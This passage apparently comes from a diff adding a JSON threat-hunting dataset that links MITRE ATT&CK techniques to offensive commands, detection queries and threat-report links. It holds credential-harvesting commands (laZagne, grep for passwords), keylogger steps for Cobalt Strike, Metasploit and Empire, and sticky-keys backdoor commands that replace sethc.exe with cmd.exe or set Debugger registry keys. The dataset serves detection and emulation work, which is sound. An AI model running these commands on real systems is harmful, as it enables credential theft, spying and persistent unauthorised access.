traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + 
"https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs", + "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf", + "https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://citizenlab.org/2016/05/stealth-falcon/", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.coresecurity.com/corelabs-research/open-source-tools/impacket", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + 
"https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + null + ] + }, + { + "technique_id": "T1081", + "command_list": [ + "shell laZagne.exe browsers [-f]", + "grep -riP password #{file_path}", + "grep -riP password /" + ], + "commands": [ + { + "command": "shell laZagne.exe browsers [-f]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "grep -riP password #{file_path}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "grep -riP password /", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "Category": "T1081", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "https://github.com/hassaanaliw/chromepass\nThis program attempts to collect passwords that Chrome stores." 
+ }, + { + "Category": "T1081", + "Built-in Windows Command": "", + "Cobalt Strike": "shell laZagne.exe browsers [-f]", + "Metasploit": "", + "Description": "https://github.com/AlessandroZ/LaZagne (now part of pupy as a post-exploit module)\nThis program attempts to collect passwords from many different data sources related to browsers - it'll get passwords from Firefox, Chrome, Opera, IE.\nthe -f command on the browsers command call is specifically targeting Firefox" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"*findstr* /si pass*\"or process_command_line contains \"*select-string -Pattern pass*\"or process_command_line contains \"*list vdir*/text:password*\")", + "name": "Credentials In Files" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit type=execve a0=grep password", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" grep password | table host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ] + }, + { + "technique_id": "T1056", + "command_list": [ + "starting the keylogger:\nkeylogger {x86|x64} {pid}\nwhen you're ready to view logs:\nview -> keylog\nwhen you're done keylogging:\njobs\njobkill {job id number}", + "starting the keylogger:\nkeyscan_start\nwhen you're ready to get the logs:\nkeyscan_dump\nwhen you're done keylogging:\nkeyscan_stop", + "powershell.exe Get-Keystrokes 
-LogPath C:\\key.log", + "powershell/collection/USBKeylogger", + "powershell/collection/keylogger", + "python/collection/linux/keylogger", + "python/collection/linux/xkeylogger", + "python/collection/osx/keylogger" + ], + "commands": [ + { + "command": "starting the keylogger:\nkeylogger {x86|x64} {pid}\nwhen you're ready to view logs:\nview -> keylog\nwhen you're done keylogging:\njobs\njobkill {job id number}", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "starting the keylogger:\nkeyscan_start\nwhen you're ready to get the logs:\nkeyscan_dump\nwhen you're done keylogging:\nkeyscan_stop", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "powershell.exe Get-Keystrokes -LogPath C:\\key.log", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/collection/USBKeylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/keylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/keylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/xkeylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/keylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1056", + "Built-in Windows Command": "", + "Cobalt Strike": 
"starting the keylogger:\nkeylogger {x86|x64} {pid}\nwhen you're ready to view logs:\nview -> keylog\nwhen you're done keylogging:\njobs\njobkill {job id number}", + "Metasploit": "starting the keylogger:\nkeyscan_start\nwhen you're ready to get the logs:\nkeyscan_dump\nwhen you're done keylogging:\nkeyscan_stop", + "Description": "Keylogging is extremely useful to get credentials and other information from the victim, but make sure that you are keylogging in a process belonging to the user you want to spy on. Keylogging within a SYSTEM process will not get you the keystrokes of other users on the system. For Cobalt Strike, make sure you specifiy the correct architecture and PID for a process running as the target victim. For Metasploit, make sure you've migrated to a process that is running as the target victim (explore.exe is always good)." + }, + { + "chain_id": "100132", + "os": "windows", + "parent_process": "powershell.exe", + "commandline_string": "Get-Keystrokes -LogPath C:\\key.log", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "input_capture", + "mitre_attack": "T1056", + "itw_sample": "" + }, + { + "Empire Module": "powershell/collection/USBKeylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": "\"powershell/collection/USBKeylogger\": [\"T1056\"]," + }, + { + "Empire Module": "powershell/collection/keylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": "\"powershell/collection/keylogger\": [\"T1056\"]," + }, + { + "Empire Module": "python/collection/linux/keylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": 
"\"python/collection/linux/keylogger\": [\"T1056\"]," + }, + { + "Empire Module": "python/collection/linux/xkeylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": "\"python/collection/linux/xkeylogger\": [\"T1056\"]," + }, + { + "Empire Module": "python/collection/osx/keylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": "\"python/collection/osx/keylogger\": [\"T1056\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4657", + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "Kernel drivers" + ], + [ + "API monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "Kernel drivers" + ], + [ + "API monitoring" + ], + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ 
+ "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process 
executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + 
"https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.justice.gov/file/1080281/download", + "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://citizenlab.org/2016/08/group5-syria/", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "Persistence:", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + 
"Category": "Persistence:", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1015", + "command_list": [ + "Sticky Keys Persistence via Registry Manipulations:\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "Sticky Keys Persistence via Registry Manipulations:\nshell REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "post/windows/manage/sticky_keys", + "Sticky Keys Persistence via binary swapping:\ntakeown.exe C:\\Windows\\system32\\sethc.exe\ndel C:\\Windows\\system32\\sethc.exe\ncopy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "Sticky Keys Persistence via binary swapping:\nshell takeown.exe C:\\Windows\\system32\\sethc.exe\nshell del C:\\Windows\\system32\\sethc.exe\nshell copy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "cmd.exe reg add", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe /v \"Debugger\" /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe /t REG_SZ /v Debugger /d 
\"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AtBroker.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "powershell/lateral_movement/invoke_wmi_debugger", + "powershell/persistence/misc/debugger" + ], + "commands": [ + { + "command": "Sticky Keys Persistence via Registry Manipulations:\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Sticky Keys Persistence via Registry Manipulations:\nshell REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/manage/sticky_keys", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "Sticky Keys Persistence via binary swapping:\ntakeown.exe C:\\Windows\\system32\\sethc.exe\ndel C:\\Windows\\system32\\sethc.exe\ncopy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Sticky Keys Persistence via binary swapping:\nshell takeown.exe C:\\Windows\\system32\\sethc.exe\nshell del C:\\Windows\\system32\\sethc.exe\nshell copy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "source": 
